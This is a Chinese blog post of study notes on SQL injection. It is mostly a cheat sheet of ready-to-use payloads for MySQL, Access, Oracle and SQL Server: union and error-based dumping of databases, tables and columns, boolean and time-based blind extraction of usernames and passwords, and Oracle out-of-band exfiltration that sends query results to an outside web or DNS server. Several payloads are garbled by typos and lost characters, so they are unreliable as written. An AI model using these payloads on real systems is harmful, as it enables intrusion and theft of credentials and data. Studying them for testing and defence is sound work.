SQL注入学习

不爱学习的安全小白

于 2024-04-18 10:15:21 发布

阅读量600

点赞数 25

文章标签： sql 学习数据库信息安全

本文链接：https://blog.csdn.net/xz_______/article/details/137910240

版权

Mysql：

联合查询注入：

判断列数：order by x（变量，输入数字判断具提列数）
判断回显注入点： union select 1,2,3,…,x(测试哪一行会显示在页面上，查看数据变化)
爆库：union select 1,2,group_concat(0x23,database(),0x23) --+
爆表：union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆字段：union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=“之前爆出的表” --+
爆数据：union select 1,2,group_concat(之前爆出的字段) from “之前爆出的表” --+

爆错注入：

extractvalue函数：
and(select extractvalue(“anything”,concat(‘~’,(select语句))))
updatexml函数：
and(select updatexml(“anything”,concat(‘~’,(select语句())),“anything”))
concat+rand()+group_by()导致主键重复：
union select 1 from (select count(*),concat((slelect语句),floor(rand(0)2))x from “一个足大的表” group by x)a–+
爆数据库名：'union select 1 from (select count(),concat((select database())," “,floor(rand(0)2))x from information_schema.tables group by x)a
爆表名：'union select 1 from (select count(),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,” “,floor(rand(0)2))x from information_schema.tables group by x)a
爆列名：'union select 1 from (select count(),concat((select column_name from information_schema.columns where table_name=“TABLE_NAME” limit 0,1) ,” “,floor(rand(0)2))x from information_schema.tables group by x)a
爆数据：'union select 1 from (select count(),concat((select COLUMN_NAME from TABLE_NAME limit 0,1) ,” ",floor(rand(0)*2))x from information_schema.tables group by x)a
布尔盲注：
恒真式恒假式判断是否存在注入点
查数据库长度：
or length(database())>7%23 true
or length(database())>8–+ false
or length(database())=8–+ true
猜数据库第一位字符：
or ascii(substr(database(),1,1))>100–+ true
or ascii(substr(database(),1,1))>120–+ false
or ascii(substr(database(),1,1))=115–+ true
猜测数据库中的表数量：
or 4=(select count(table_name) from information_schema.tables where table_schema=database());–+
猜测第一个表中的第一个字符：
or ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101–+
猜测字段长度：
or (select count(column_name) from information_schema.columns where table_schema=database() and table_name=‘emails’)=2–+
查第一个字段全名：
or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘emails’ limit 0,1),1,1))>104–+
猜测表中字段具体内容的条数
or 8=(select count(id) from security.emails)–+
查email_id字段的第一条具体内容：
or ascii(substr((select email_id from security.emails limit 0,1),1,1))=68–+

时间盲注：

判断是否为时间盲注：
’ and sleep(5) --+
插入if条件语句看是否执行了时间延迟，获取数据库长度：
and if(length(database())=8,sleep(5),0)–+
获取第一个字符：
’ and if(left(database(),1)=‘s’ , sleep(3), 1) --+
获取表的第一个字符：
’ and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r’ , sleep(3), 1) --+
获取列：
’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 4,1),8)=‘password’, sleep(3), 1) --+
具体内容：
’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ , sleep(3), 1) --+

Access：
我们想来了解一下access数据库

Access注入是暴力猜解

Access数据结构（access只有一个数据库）

Access数据库

表名

列名

数据

没有库这个概念只有表这个概念

这应该就是今天的sql语句
判断是否为access数据库：
and exists (select * from msysobjects)>0
查看显示位
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
构造语句

查表：and exists (select * from 表名) 存在的话就返回正常不存在就返回不正常

查列：and exists (select 列名 from 表名)

查数据：1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5 //=换成<=5也成立，下同
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97

Oracle：

dual表，此表是Oracle数据库中的一个自带表，有说法这是一个虚拟表，也有的说是一个实表，它实际上位满足查询条件而产生
与MySQL不同的是，在MySQL中查询语句可以直接是：select 1,2，但是在Oracle中就必须跟一个表名，如下：select * from dual
涉及到的基本用法：
select * from all_tables 查询出所有的表
select * from user_tables 查询出当前用户的表
selectfrom all_tab_columns 查询出所有的字段
selectfrom user_tab_columns 查询出当前用户的字段
select*from v$version 查版本

联合查询注入：

1.首先order by 数量确定列的数量
2.然后union select null,’null’,null from admin 必须用null如果返回错入则代表引号内的列不是字符列，直到返回正确的为止
3.判断一下数据库中的表网址后面加上and (select count(*) from admin) <>0 返回正常，说明存在admin表。如果返回错误可将admin改为username,manager等常用表名继续猜解。

4.判断列名and (select count() from admin) <>0 将这条语句中的号替换为常用的列名，如：and (select count(user) from admin) <>0如果存在则代表admin这个表中有user这个列
5.判断该网站下有几个管理员，如果有多个的话入侵的几率就会加大。
例如：and (select count() from admin)=1
返回正常说明只有一个管理员。
6.判断账号的长度 and (select count() from admin where length(name)>=5)=1
说明：length()函数用于求字符串的长度此处猜解的用户名长度和5比较，即可猜测是否由5个字符组成。
7.判断第一个字母 and (select count() from admin where ascii(substr(name,1,1))>=9)=1
说明：substr()函数用于截取字符串，ascii()函数用于获取字符的ascii码，此处的意思是截取name字段的第一个字符，获取他的ascii码值。
8. 重复此操作即可推出全部的用户名
如：and (select count() from admin where ascii(substr(name,2,1))>=9)=1 猜解第二个字符。。。依次类推
继续猜解密码：and (select count(*) from admin where ascii(substr(pwd,1,1))>=9)=1 猜解pwd表的第一个字符

报错注入：

dbms_xdb_version.checkin()函数
属于dbms_xdb_version下的checkin功能。此功能检入签出的VCR并返回新创建的版本的资源ID。
语法为：payload：and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
dbms_xdb_version.uncheckout()函数
用法与checkin一致，payload：and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
dbms_xdb_version.makeversioned()函数
用法与checkin一致，payload：and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
dbms_utility.sqlid_to_sqlhash()函数
用法与checkin一致，payload：and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
ctxsys.drithsx.sn()函数
and 1=ctxsys.drithsx.sn(1,(select user from dual))–
Oracle带外查询
使用Oracle发送HTTP请求，相关函数：utl_http.request()，需要自己搭建外网web服务器，并记录请求的日志信息，然后使用utl_http.request()向外网主机发送http请求，请求便携带了查询的结果信息。此处可以结合SSRF进行内网探测，或许这就是Oracle的ssrf。。。
poyload：http://xxx.xxx.xx.xx/xxx/selcet?suser=1&sname=1’ and 1=utl_http.request(‘http://XXXXXXXXXXX/’||(select banner from sys.v_$version where rownum=1)) –
使用Oracle发送DNS请求，相关函数：utl_inaddr.get_host_address()、utl_inaddr.get_host_name()，将查询结果拼接到域名下，并使用DNS记录解析日志
http://xxx.xxx.xx.xx/xxx/selcet?suser=1&sname=1’ and (select utl_inaddr.get_host_address((select user from dual)||‘.xxx.xxx’) from dual)is not null–

Oracle盲注

测试和漏洞挖掘中，并没有出现数据库报错信息，使用测试语句进行测试发现只能通过页面正常与否来判断SQL语句是否执行了，这种情况需要使用布尔盲注，盲注可以使用ASCII()，substr()这种通用组合获取数
使用length()函数判断长度，使用ascii()和substr()函数猜解数据，判断用户名长度
使用decode函数进行布尔盲注，substr(user,1,1)是条件，'B’是要遍历的位置（这里B是用户名的首字母），如果匹配便返回翻译值1，否则使用默认值0。

decode()函数用法。decode(条件,值1,翻译值1,值2,翻译值2,…值n,翻译值n,缺省值)

if(条件值1)>返回翻译值1，否则返回默认值

payload：http://xxx.xxx.xx.xx/?id=2’and 1=(select decode(substr(user,1,1),‘B’,(1),0) from dual) --+
使用instr进行布尔盲注,（select user from dual）是查询结果数据，instr会返回’B’位置数据在，查询结果中的位置，未找到便返回0，可以通过对‘SQL’位置进行遍历和迭代，获取到数据。类似MYSQL regexp注入的方法。

http://xxx.xxx.xx.xx/?id=2’and 1=(instr((select user from dual),‘B’)) --+
instr这种方式在应对重复字符时，只能返回第一个字符的位置，比如字符串’aabbcc’，查找a只能返回1，那这样就查不到第二个相同字符，最后我们得到的返回值是a->1，b->3，c->5，但是我们根据lengtg()函数知道长度是6，那么就可以直接不全了2位置一定是a，如果是别的不可能查不到，也可以得出aabbcc
延迟注入
测试和漏洞挖掘中，通过页面响应的状态，这里指的是响应时间，通过这种方式判断SQL是否被执行的方式，便是时间盲注；oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE()，这个也是通过SQLMAP源码中发现的

DBMS_PIPE.RECEIVE_MESSAGE(‘任意值’,延迟时间)

实际用法如下
AND 7238=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1))>1) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(106)||CHR(72)||CHR(73),10) ELSE 7238 END)
而另外一种便是decode()与高耗时SQL操作的组合，当然也可以是case，if 等方式与高耗时操作的组合，这里的高耗时操作指的是，例如：(select count(*) from all_objects)，对数据库中大量数据进行查询或其他处理的操作，这样的操作会耗费较多的时间，然后通过这个方式来获取数据。这种方式也适用于其他数据库

实际用法如下
and 1=(select decode(substr(user,1,1),‘B’,(select count(*) from all_objects),0) from dual)–+

SQLServer数据库

SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS)，是一个比较大型的数据库。端口号为 1433。数据库后缀名 .mdf，注释符是 –

sa权限：数据库操作，文件管理，命令执行，注册表读取等system。SQLServer数据库的最高权限
db权限：文件管理，数据库操作等权限 users-administrators
public权限：数据库操作 guest-users
SQLServer数据库有6个默认的库，分别是4个系统数据库：master 、model 、msdb 、tempdb，和2个其他数据库：ReportServer、ReportServerTempDB。其中，model和tempdb是默认没有数据表的。
但是如果用navicat远程连接的话，只会显示2个数据库：ReportServer、ReportServerTempDB
下面这个为sqlserver的判断语句and exists (select * from sysobjects)>0
判断dbid数据库的长度，由以下得知dbid为1数据库的长度是8
and len(db_name(1))>5 //正常显示
and len(db_name(1))>10 //不正常显示
and len(db_name(1))>7 //正常显示
and len(db_name(1))>8 //不正常显示

判断dbid为2数据库字符的ascii值
and ascii(substring(db_name(2),1,1))>95 //正常显示
and ascii(substring(db_name(2),1,1))>100 //不正常显示
and ascii(substring(db_name(2),1,1))>96 //正常显示
and ascii(substring(db_name(2),1,1))>97 //不正常显示

所以dbid为1数据库的第一个字符的ascii值为97，即为a。

以此类推，数据库的第二个字符为 and ascii(substring(db_name(),2,1))>97
数据库的第三个字符为：and ascii(substring(db_name(),3,1))>97
直到爆出数据库最后一位字符，得到数据库名字。
这里假设我们知道了数据库中存在 test 数据库。

爆破test数据库中表的个数

and (select count(name) from test…sysobjects where xtype=‘U’)>N
爆破test数据库中表的长度和名称

爆破test数据库中第一个表的长度：
and len((select top 1 name from test…sysobjects where xtype=‘U’ and id not in (select top 1 id from test…sysobjects where xtype=‘U’)))=N
爆破test数据库中第一个表的第一个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 1 id from test…sysobjects where xtype=‘U’)),1,1))>115
爆破test数据库中第一个表的第二个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 1 id from test…sysobjects where xtype=‘U’)),2,1))>115
爆破test数据库中第一个表的第三个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 1 id from test…sysobjects where xtype=‘U’)),3,1))>115
…

爆破test数据库中第二个表的长度：
and len((select top 1 name from test…sysobjects where xtype=‘U’ and id not in (select top 2 id from msdb…sysobjects where xtype=‘U’)))=N
爆破test数据库中第二个表的第一个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 2 id from test…sysobjects where xtype=‘U’)),1,1))>115
爆破test数据库中第二个表的第二个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 2 id from test…sysobjects where xtype=‘U’)),2,1))>115
爆破test数据库中第二个表的第三个字符的ascii值：
and ascii(substring((select top 1 name from test…sysobjects where xtype=‘U’ and id not in(select top 2 id from test…sysobjects where xtype=‘U’)),3,1))>115
…
这里假设我们爆出了user表

爆破test数据库中user表的列数

and (select count(name) from test…syscolumns where id=(select id from test…sysobjects where name=‘user’))=N
爆破test数据库中user表的列名

爆破test数据库中user表的第一列的长度：
and len((select top 1 col_name(object_id(‘user’),1) from test…sysobjects))>10
爆破test数据库中user表的第一列的第一个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),1) from test…sysobjects),1,1))>97
爆破test数据库中user表的第一列的第二个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),1) from test…sysobjects),2,1))>97
爆破test数据库中user表的第一列的第三个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),1) from test…sysobjects),3,1))>97
…

爆破test数据库中user表的第二列的长度：
and len((select top 1 col_name(object_id(‘user’),2) from test…sysobjects))>10
爆破test数据库中user表的第二列的第一个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),2) from test…sysobjects),1,1))>97
爆破test数据库中user表的第二列的第二个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),2) from test…sysobjects),2,1))>97
爆破test数据库中user表的第二列的第三个字符的ascii值：
and ascii(substring((select top 1 col_name(object_id(‘user’),2) from test…sysobjects),3,1))>97
…
这里假设我们爆出了password列

爆出test数据库中user表中password列的数据条数

and (select count(*) from test…user)=N
爆破test数据库中user表中password列中的数据

爆破test数据库中user表中password列中第一行数据的长度
and (select top 1 len(password) from test…user where password not in (select top 1 id from test…user))>N
爆破test数据库中user表中password列中第一行数据的第一个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 1 id from test.user)),1,1))>10
爆破test数据库中user表中password列中第一行数据的第二个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 1 id from test.user)),2,1))>10
爆破test数据库中user表中password列中第一行数据的第三个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 1 id from test.user)),3,1))>10
…

爆破test数据库中user表中password列中第二行数据的长度
and (select top 1 len(password) from test…user where password not in (select top 2 id from test…user))>N
爆破test数据库中user表中password列中第二行数据的第一个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 2 id from test.user)),1,1))>10
爆破test数据库中user表中password列中第二行数据的第二个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 2 id from test.user)),2,1))>10
爆破test数据库中user表中password列中第二行数据的第三个字符的ascii值
and ascii(substring((select top 1 cast(password as varchar) from test.user where password not in (select top 2 id from test.user)),3,1))>10
…